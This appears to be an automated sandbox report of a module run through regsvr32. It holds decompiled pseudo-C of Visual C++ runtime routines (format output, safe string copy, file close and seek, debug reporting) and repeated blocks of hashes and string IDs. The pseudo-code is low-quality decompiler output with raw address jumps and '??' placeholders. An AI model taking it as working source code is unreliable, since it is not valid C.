                                    				if (_a1344 != 0) goto 0xf9d3ed13;
                                    				_t370 = L"((state == ST_NORMAL) || (state == ST_TYPE))";
                                    				_a32 = _t370;
                                    				r9d = 0;
                                    				r8d = 0x8f5;
                                    				0xf9d2b3b0();
                                    				if (_t268 != 1) goto 0xf9d3ed13;
                                    				asm("int3");
                                    				if (_a1344 != 0) goto 0xf9d3ed6f;
                                    				0xf9d2ab30();
                                    				 *_t370 = 0x16;
                                    				_a32 = 0;
                                    				r9d = 0x8f5;
                                    				E000007FE7FEF9D2BD70(L"((state == ST_NORMAL) || (state == ST_TYPE))", L"_woutput_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
                                    				_a1376 = 0xffffffff;
                                    				E000007FE7FEF9D26800( &_a120);
                                    				goto 0xf9d3ed8e;
                                    				_a1380 = _a1200;
                                    				E000007FE7FEF9D26800( &_a120);
                                    				return E000007FE7FEF9D23280(_a1380, 2, 2, _a1512 ^ _t400, L"_woutput_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
                                    			}













                                    0x7fef9d3ed0e
                                    0x7fef9d3ed10
                                    0x7fef9d3ed1b
                                    0x7fef9d3ed1d
                                    0x7fef9d3ed22
                                    0x7fef9d3ed28
                                    0x7fef9d3ed31
                                    0x7fef9d3ed4c
                                    0x7fef9d3ed51
                                    0x7fef9d3ed61
                                    0x7fef9d3ed6d
                                    0x7fef9d3ed76
                                    0x7fef9d3ed82
                                    0x7fef9d3eda5

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: get_int64_arg
                                    • String ID: ("Incorrect format specifier", 0)$9$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                    • API String ID: 1967237116-1983305044
                                    • Opcode ID: 39c1530eb87c93b5c15807e3225054cbc2f74160d6d1f03a50421518d7a029c2
                                    • Instruction ID: 35e4d6cfc5d3e5722aa157ca10994467d352d975a6b38eaa5eb17889d52142ca
                                    • Opcode Fuzzy Hash: 39c1530eb87c93b5c15807e3225054cbc2f74160d6d1f03a50421518d7a029c2
                                    • Instruction Fuzzy Hash: 7AF1D872A0DAC58AE7B18B55E8417AFB7E0F784346F200125E6C987AE9EB7DD440CF50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _invalid_parameter
                                    • String ID: (((_Src))) != NULL$((_Dst)) != NULL && ((_SizeInWords)) > 0$(L"Buffer is too small" && 0)$(L"String is not null terminated" && 0)$Buffer is too small$String is not null terminated$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\tcscat_s.inl$wcscat_s
                                    • API String ID: 2123368286-3477667311
                                    • Opcode ID: 5284e54803fa5a35f276e18858076b29593f150ab8ed8022a36a7ce25e0bf2f4
                                    • Instruction ID: c8a25613ed3391733179227ae6d5cd1be8fc2ee2dc7f1a1db629f40b2a14394d
                                    • Opcode Fuzzy Hash: 5284e54803fa5a35f276e18858076b29593f150ab8ed8022a36a7ce25e0bf2f4
                                    • Instruction Fuzzy Hash: CAF13832A0DB8685EBE08B19E94476EA3E0F385790F604535D6DE83BA8DF7ED045CB01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _invalid_parameter
                                    • String ID: (((_Src))) != NULL$((_Dst)) != NULL && ((_SizeInBytes)) > 0$(L"Buffer is too small" && 0)$(L"String is not null terminated" && 0)$Buffer is too small$String is not null terminated$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\tcscat_s.inl$strcat_s
                                    • API String ID: 2123368286-1420200500
                                    • Opcode ID: cc07cef64c5b8afb013f442fd59d1430f3c77c8b5aa073aebe04f881c7874d42
                                    • Instruction ID: 80c7b19323cb8e8402763de004709ed27ed9fdf882d4b7b175d6de3bd1baee6a
                                    • Opcode Fuzzy Hash: cc07cef64c5b8afb013f442fd59d1430f3c77c8b5aa073aebe04f881c7874d42
                                    • Instruction Fuzzy Hash: CDF13A32A0CB8A89EBA08B14E84576EA7E0F385795FA04535D6DD43BE8DB7ED044CB01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Locale$UpdateUpdate::~__get_printf_count_output_invalid_parameterget_int64_argwctomb_s
                                    • String ID: ("'n' format specifier disabled", 0)$("Incorrect format specifier", 0)$-$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                    • API String ID: 2560055391-3497434347
                                    • Opcode ID: 667eef7f1f49c1d82be4abe5f7b2b6c0360aabec3e49fa9d9e3a648fddbc0f41
                                    • Instruction ID: 0908f7725f90b5cc69585d97bf8e44ac8e860db6174f4101cd143eaefdb7169b
                                    • Opcode Fuzzy Hash: 667eef7f1f49c1d82be4abe5f7b2b6c0360aabec3e49fa9d9e3a648fddbc0f41
                                    • Instruction Fuzzy Hash: 87C11C72A0C7C686E7B1DB64E8457BEB7E4F384785F604025DAC886AA9DB7DE540CF00
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: __doserrno$_invalid_parameter
                                    • String ID: ("Invalid file descriptor. File possibly closed by a different thread",0)$(_osfile(fh) & FOPEN)$(fh >= 0 && (unsigned)fh < (unsigned)_nhandle)$_lseeki64$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\lseeki64.c
                                    • API String ID: 747159061-1442092225
                                    • Opcode ID: 14faf06f4b776b3818928093306a4898f737286e5044e20a730c767404cf7ae4
                                    • Instruction ID: ad53dfe6714ab654120e1b154ee45b7e90274128f767a3acb20d12471acdd345
                                    • Opcode Fuzzy Hash: 14faf06f4b776b3818928093306a4898f737286e5044e20a730c767404cf7ae4
                                    • Instruction Fuzzy Hash: AE617C72A1C646CAE7909B25EC4076E72E1F780765F604725E6ED47AF9DB3EE440CB00
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _exit_invoke_watson_if_error_invoke_watson_if_oneof
                                    • String ID: Module: $(*_errno())$...$Debug %s!Program: %s%s%s%s%s%s%s%s%s%s%s%s(Press Retry to debug the application)$Microsoft Visual C++ Debug Library$_CrtDbgReport: String too long or IO Error$__crtMessageWindowA$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgrpt.c$strcpy_s(szOutMessage, 4096, "_CrtDbgReport: String too long or IO Error")
                                    • API String ID: 1778837556-2487400587
                                    • Opcode ID: 1725f90675b356b8c96096f206fe05692ea700145f07fa5ff60a00d667238266
                                    • Instruction ID: a9706cbd1d0bc1ca6f0e01aa99e4221a5492a8f84fcd1c14ee91e7fca0fd8dc0
                                    • Opcode Fuzzy Hash: 1725f90675b356b8c96096f206fe05692ea700145f07fa5ff60a00d667238266
                                    • Instruction Fuzzy Hash: 5351D376608BC191E774DB18E8803EEB3E1F788384F604126EACD43AA9DB7ED154CB41
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: DecodePointer$Locale$UpdateUpdate::~__invalid_parameterwctomb_s
                                    • String ID: ("Incorrect format specifier", 0)$-$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                    • API String ID: 83251219-3442986447
                                    • Opcode ID: a7736ae2d77719cf8dd033ea8b01e94f48993e2d03ef0b45187a851eb092d1a4
                                    • Instruction ID: afb1911e3f8ba5d231fe6bb84017af69377ca2ae416e2d0ba459e573d29e7d3a
                                    • Opcode Fuzzy Hash: a7736ae2d77719cf8dd033ea8b01e94f48993e2d03ef0b45187a851eb092d1a4
                                    • Instruction Fuzzy Hash: 0BF1C87260CBC186E7B1CB25E8947AEB7E4E384785F604125EACD87AA9DB7DD540CF00
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _invalid_parameter
                                    • String ID: ("Invalid file descriptor. File possibly closed by a different thread",0)$(_osfile(filedes) & FOPEN)$(filedes >= 0 && (unsigned)filedes < (unsigned)_nhandle)$_commit$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\commit.c
                                    • API String ID: 2123368286-2816485415
                                    • Opcode ID: a09a08489fcfa17bf46b80f7bccdd7250e5da7b82fa925d7c8e71ba256914943
                                    • Instruction ID: 498ed5c56ac792471b44c6766317b9cb43c4201113c662a7075568a19f5733c1
                                    • Opcode Fuzzy Hash: a09a08489fcfa17bf46b80f7bccdd7250e5da7b82fa925d7c8e71ba256914943
                                    • Instruction Fuzzy Hash: 0E617B72A1D64686EB909B28EC4176E73E1F780354F608225E6DE47AF5D77EE400CF02
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: __doserrno$_invalid_parameter
                                    • String ID: ("Invalid file descriptor. File possibly closed by a different thread",0)$(_osfile(fh) & FOPEN)$(fh >= 0 && (unsigned)fh < (unsigned)_nhandle)$_close$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\close.c
                                    • API String ID: 747159061-2992490823
                                    • Opcode ID: 31e6f22f94a5a332f8c1da309800fd96aa675ce4ff76475566f44e9374f3c210
                                    • Instruction ID: b3e96d9819a7910145883aa8d7fc7971cc91d039debb2f2cb13e78280c4cdede
                                    • Opcode Fuzzy Hash: 31e6f22f94a5a332f8c1da309800fd96aa675ce4ff76475566f44e9374f3c210
                                    • Instruction Fuzzy Hash: 2F516B71A186468AE7909B69EC8176E73E2F380758F608621E2DD476F5D77EE400CF02
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Locale$UpdateUpdate::~__get_printf_count_output_invalid_parameterget_int64_arg
                                    • String ID: ("'n' format specifier disabled", 0)$("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                    • API String ID: 1328470723-1899493600
                                    • Opcode ID: 66637f3263954389c4faca3e64166f48d89120a2e65f09c6e12548c2e7ae54a3
                                    • Instruction ID: a75f166a54a10c782c9e5936c38e4db03d9624ec2b4b775b3bb68b676b0f6840
                                    • Opcode Fuzzy Hash: 66637f3263954389c4faca3e64166f48d89120a2e65f09c6e12548c2e7ae54a3
                                    • Instruction Fuzzy Hash: 38C10D72A0CAC286E7B19B55E8447AFB7E0F384346F604125E6C987AE9DB7DE444CF10
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: ByteCharMultiWide$AllocaMarkStringmalloc
                                    • String ID:
                                    • API String ID: 2352934578-0
                                    • Opcode ID: c62487d166d7dca86c557c7a35fedf321effa742b468bc4a62d127ec3f3969a5
                                    • Instruction ID: 07e98e5d3e74dc1edba9ed484819fff5a1f4d1c282268086727bfc73f0da1f11
                                    • Opcode Fuzzy Hash: c62487d166d7dca86c557c7a35fedf321effa742b468bc4a62d127ec3f3969a5
                                    • Instruction Fuzzy Hash: E8B1D73690C7818AE7A0CB5AE84476FB7E0F789754F214525EAC983BA8DB7ED444CF40
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _invalid_parameter
                                    • String ID: (((_Src))) != NULL$((_Dst)) != NULL && ((_SizeInWords)) > 0$(L"Buffer is too small" && 0)$Buffer is too small$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\tcsncpy_s.inl$wcsncpy_s
                                    • API String ID: 2123368286-322314505
                                    • Opcode ID: 399a9458fa01abea37a4ed0ff3a6319967a0ea4a6e471ce5995f41885ca75c61
                                    • Instruction ID: 4ea1f2baf56cb797ddf9edfbcd87f382fde430b96fb790801732b827a7e5f6be
                                    • Opcode Fuzzy Hash: 399a9458fa01abea37a4ed0ff3a6319967a0ea4a6e471ce5995f41885ca75c61
                                    • Instruction Fuzzy Hash: 02023E32A0CB8585EBF09B29E94476EA3E0F385795F604625D6DD83BE5DF3ED0848B01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: DecodePointer$Locale$UpdateUpdate::~__invalid_parameter
                                    • String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                    • API String ID: 1139040907-3988320827
                                    • Opcode ID: 2dc7b4f9e3ef16c46f4c156222616883407f9e483511c99d0d30e534b880734d
                                    • Instruction ID: be767cf373226b306d5cc4d655a52930cc25a89ebff261bf8d2d4167a1edb2b7
                                    • Opcode Fuzzy Hash: 2dc7b4f9e3ef16c46f4c156222616883407f9e483511c99d0d30e534b880734d
                                    • Instruction Fuzzy Hash: 48F1DA72A0CAC18AE7A08B55E8407AFB7E0F7C5756F600126E6CD87AA9DB7DD440CF50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _invalid_parameter
                                    • String ID: (((_Src))) != NULL$((_Dst)) != NULL && ((_SizeInWords)) > 0$(L"Buffer is too small" && 0)$Buffer is too small$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\tcscpy_s.inl$wcscpy_s
                                    • API String ID: 2123368286-3300880850
                                    • Opcode ID: 5aefbc8f1d73eb7cfc6612018eacf67af3b13798598c0c57764cabda027a92b3
                                    • Instruction ID: 4116fe211f4ce550b5db6f2beda9aad957ea61137f05a11edd57804cc24ee7cf
                                    • Opcode Fuzzy Hash: 5aefbc8f1d73eb7cfc6612018eacf67af3b13798598c0c57764cabda027a92b3
                                    • Instruction Fuzzy Hash: A4C14B31A0DB8685EBB08B29E84476E63E4F385795F608235D6DD43BA5DF7ED084CB01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _invalid_parameter
                                    • String ID: (((_Src))) != NULL$((_Dst)) != NULL && ((_SizeInBytes)) > 0$(L"Buffer is too small" && 0)$Buffer is too small$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\tcscpy_s.inl$strcpy_s
                                    • API String ID: 2123368286-3045918802
                                    • Opcode ID: 3a73121abd8cd92c4d24009a6c05b63160c008938b58f8c852a28b4bc1f5a78a
                                    • Instruction ID: 83c83e0f84f27b13c419585d1e3107a86c1b002b2dbb410691c45864cb0988c3
                                    • Opcode Fuzzy Hash: 3a73121abd8cd92c4d24009a6c05b63160c008938b58f8c852a28b4bc1f5a78a
                                    • Instruction Fuzzy Hash: 3AC13D3190DB8A85EBA08B19E84436EA3E0F386794F614135D6DE43BB5DF7ED448CB11
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 15%
                                    			E000007FE7FEF9D3F000(long long __rcx, signed char* __rdx, long long __r8, long long __r9, long long _a8, signed char* _a16, long long _a24, long long _a32) {
                                    				intOrPtr _v24;
                                    				long long _v32;
                                    				intOrPtr _v36;
                                    				intOrPtr _v40;
                                    				intOrPtr _v44;
                                    				intOrPtr _v48;
                                    				intOrPtr _v52;
                                    				intOrPtr _v56;
                                    				char _v88;
                                    				intOrPtr _v96;
                                    				long long _v104;
                                    				void* _t80;
                                    				void* _t81;
                                    				void* _t89;
                                    				void* _t92;
                                    				intOrPtr _t102;
                                    				intOrPtr* _t136;
                                    				intOrPtr* _t137;
                                    				intOrPtr* _t139;
                                    				signed char* _t141;
                                    				intOrPtr* _t142;
                                    				intOrPtr* _t143;
                                    				intOrPtr* _t144;
                                    				intOrPtr* _t148;
                                    				intOrPtr* _t149;
                                    
                                    				_a32 = __r9;
                                    				_a24 = __r8;
                                    				_a16 = __rdx;
                                    				_a8 = __rcx;
                                    				if (_a16 == 0) goto 0xf9d3f031;
                                    				if (_a24 != 0) goto 0xf9d3f038;
                                    				goto 0xf9d3f31a;
                                    				_t136 = _a16;
                                    				if ( *_t136 != 0) goto 0xf9d3f066;
                                    				if (_a8 == 0) goto 0xf9d3f05f;
                                    				 *_a8 = 0;
                                    				goto 0xf9d3f31a;
                                    				0xf9d266b0();
                                    				_t80 = E000007FE7FEF9D26840(0,  &_v88);
                                    				_t137 =  *_t136;
                                    				if ( *((intOrPtr*)(_t137 + 0x10c)) == 1) goto 0xf9d3f0d2;
                                    				_t81 = E000007FE7FEF9D26840(_t80,  &_v88);
                                    				if ( *((intOrPtr*)( *_t137 + 0x10c)) == 2) goto 0xf9d3f0d2;
                                    				_t139 = L"_loc_update.GetLocaleT()->locinfo->mb_cur_max == 1 || _loc_update.GetLocaleT()->locinfo->mb_cur_max == 2";
                                    				_v104 = _t139;
                                    				r9d = 0;
                                    				r8d = 0x47;
                                    				0xf9d2b3b0();
                                    				if (_t81 != 1) goto 0xf9d3f0d2;
                                    				asm("int3");
                                    				E000007FE7FEF9D26840(0,  &_v88);
                                    				if ( *((intOrPtr*)( *_t139 + 0x14)) != 0) goto 0xf9d3f121;
                                    				if (_a8 == 0) goto 0xf9d3f106;
                                    				_t141 = _a16;
                                    				 *_a8 =  *_t141 & 0x000000ff;
                                    				_v56 = 1;
                                    				E000007FE7FEF9D26800( &_v88);
                                    				goto 0xf9d3f31a;
                                    				E000007FE7FEF9D26840(_v56,  &_v88);
                                    				if (E000007FE7FEF9D32B90( *_a16 & 0x000000ff, _t141, _t141) == 0) goto 0xf9d3f276;
                                    				_t89 = E000007FE7FEF9D26840(_t88,  &_v88);
                                    				_t142 =  *_t141;
                                    				if ( *((intOrPtr*)(_t142 + 0x10c)) - 1 <= 0) goto 0xf9d3f1f3;
                                    				E000007FE7FEF9D26840(_t89,  &_v88);
                                    				_t143 =  *_t142;
                                    				if (_a24 -  *((intOrPtr*)(_t143 + 0x10c)) < 0) goto 0xf9d3f1f3;
                                    				if (_a8 == 0) goto 0xf9d3f191;
                                    				_v36 = 1;
                                    				goto 0xf9d3f199;
                                    				_v36 = 0;
                                    				_t92 = E000007FE7FEF9D26840( *((intOrPtr*)(_t143 + 0x10c)),  &_v88);
                                    				_t144 =  *_t143;
                                    				_v32 = _t144;
                                    				E000007FE7FEF9D26840(_t92,  &_v88);
                                    				_v96 = _v36;
                                    				_v104 = _a8;
                                    				r9d =  *((intOrPtr*)(_v32 + 0x10c));
                                    				if (MultiByteToWideChar(??, ??, ??, ??, ??, ??) != 0) goto 0xf9d3f247;
                                    				E000007FE7FEF9D26840(_t94,  &_v88);
                                    				if (_a24 -  *((intOrPtr*)( *((intOrPtr*)( *_t144)) + 0x10c)) < 0) goto 0xf9d3f221;
                                    				_t148 = _a16;
                                    				if ( *((char*)(_t148 + 1)) != 0) goto 0xf9d3f247;
                                    				0xf9d2ab30();
                                    				 *_t148 = 0x2a;
                                    				_v52 = 0xffffffff;
                                    				E000007FE7FEF9D26800( &_v88);
                                    				goto 0xf9d3f31a;
                                    				E000007FE7FEF9D26840(_v52,  &_v88);
                                    				_t149 =  *_t148;
                                    				_v48 =  *((intOrPtr*)(_t149 + 0x10c));
                                    				E000007FE7FEF9D26800( &_v88);
                                    				_t102 = _v48;
                                    				goto 0xf9d3f310;
                                    				if (_a8 == 0) goto 0xf9d3f28b;
